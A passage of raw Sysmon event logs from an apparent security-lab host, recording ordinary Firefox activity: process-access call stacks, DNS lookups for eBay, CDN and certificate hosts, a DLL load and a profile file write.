Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8 10341000x800000000000000017485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:17.709{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program 
Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:17.709{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla 
Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:17.709{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:17.708{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program 
Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 734700x800000000000000017481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:17.634{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\System32\svchost.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 22542200x800000000000000017480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.615{59A5CD1D-945A-6005-3305-00000000A301}7052pages.ebay.com0type: 5 epage.g.ebay.com;::ffff:209.140.148.240;::ffff:216.113.179.36;::ffff:216.113.181.254;::ffff:209.140.144.108;::ffff:209.140.146.171;::ffff:209.140.148.12;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:16.400{59A5CD1D-945A-6005-3305-00000000A301}7052rover.ebay.de0type: 5 slot9428.ebay.com.edgekey.net;type: 5 e9428.a.akamaiedge.net;::ffff:104.75.89.51;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.319{59A5CD1D-945A-6005-3305-00000000A301}7052safebrowsing.googleapis.com02a00:1450:4001:800::200a;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.313{59A5CD1D-945A-6005-3305-00000000A301}7052safebrowsing.googleapis.com0142.250.74.202;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.312{59A5CD1D-945A-6005-3305-00000000A301}7052safebrowsing.googleapis.com0::ffff:142.250.74.202;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.103{59A5CD1D-945A-6005-3305-00000000A301}7052rover.intl.g.ebay.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.093{59A5CD1D-945A-6005-3305-00000000A301}7052rover.intl.g.ebay.com0209.140.129.51;209.140.129.66;209.140.129.82;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.092{59A5CD1D-945A-6005-3305-00000000A301}7052rover.ebay.com0type: 5 rover.ebaycdn.net;type: 5 rover.intl.g.ebay.com;::ffff:209.140.129.82;::ffff:209.140.129.51;::ffff:209.140.129.66;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:16.081{59A5CD1D-945A-6005-3305-00000000A301}7052cs950197015.wpc.systemcdn.net02606:2800:233:73a0:db44:eb2:3cfa:f2e5;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.047{59A5CD1D-945A-6005-3305-00000000A301}7052ebayimg.map.fastly.net02a04:4e42:1b::718;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.044{59A5CD1D-945A-6005-3305-00000000A301}7052ebayimg.map.fastly.net0151.101.114.206;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.043{59A5CD1D-945A-6005-3305-00000000A301}7052i.ebayimg.com0type: 5 images.ebaycdn.net;type: 5 ebayimg.map.fastly.net;::ffff:151.101.114.206;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:17.089{59A5CD1D-8E56-6005-2E00-00000000A301}2464155.23.199.152.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000017502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.924{59A5CD1D-8E56-6005-2E00-00000000A301}2464206.114.101.151.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000017501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.921{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.sectigo.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.920{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.sectigo.com0151.139.128.14;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:16.919{59A5CD1D-8E56-6005-2E00-00000000A301}246451.89.75.104.in-addr.arpa.0type: 12 a104-75-89-51.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000017498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.919{59A5CD1D-8E56-6005-2E00-00000000A301}246485.89.79.104.in-addr.arpa.0type: 12 a104-79-89-85.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000017497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.919{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.sectigo.com0::ffff:151.139.128.14;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.626{59A5CD1D-945A-6005-3305-00000000A301}7052epage.g.ebay.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.616{59A5CD1D-945A-6005-3305-00000000A301}7052epage.g.ebay.com0216.113.179.36;216.113.181.254;209.140.144.108;209.140.146.171;209.140.148.12;209.140.148.240;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.538{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program 
Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.538{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla 
Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.537{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 11241100x800000000000000017491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.347{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\0lpne0dw.default-release\serviceworker.txt2021-01-18 14:00:18.347 
10341000x800000000000000017490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.347{59A5CD1D-945A-6005-3305-00000000A301}70526276C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+11c31bc|C:\Program Files\Mozilla Firefox\xul.dll+f7d0bf|C:\Program Files\Mozilla Firefox\xul.dll+f7420a|C:\Program Files\Mozilla Firefox\xul.dll+2259d90|C:\Program Files\Mozilla Firefox\xul.dll+226f63a|C:\Program Files\Mozilla Firefox\xul.dll+2252f19|C:\Program Files\Mozilla Firefox\xul.dll+2252c53|C:\Program Files\Mozilla Firefox\xul.dll+2256ba0|C:\Program Files\Mozilla Firefox\xul.dll+226bd4d|C:\Program Files\Mozilla Firefox\xul.dll+2275208|C:\Program Files\Mozilla Firefox\xul.dll+2274234|C:\Program Files\Mozilla Firefox\xul.dll+225db83|C:\Program Files\Mozilla Firefox\xul.dll+3af91|C:\Program Files\Mozilla Firefox\xul.dll+39cbd|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x800000000000000017489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.160{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla 
Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.160{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla 
Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.999{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.952{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:19.947{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.676{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla 
Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.676{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla 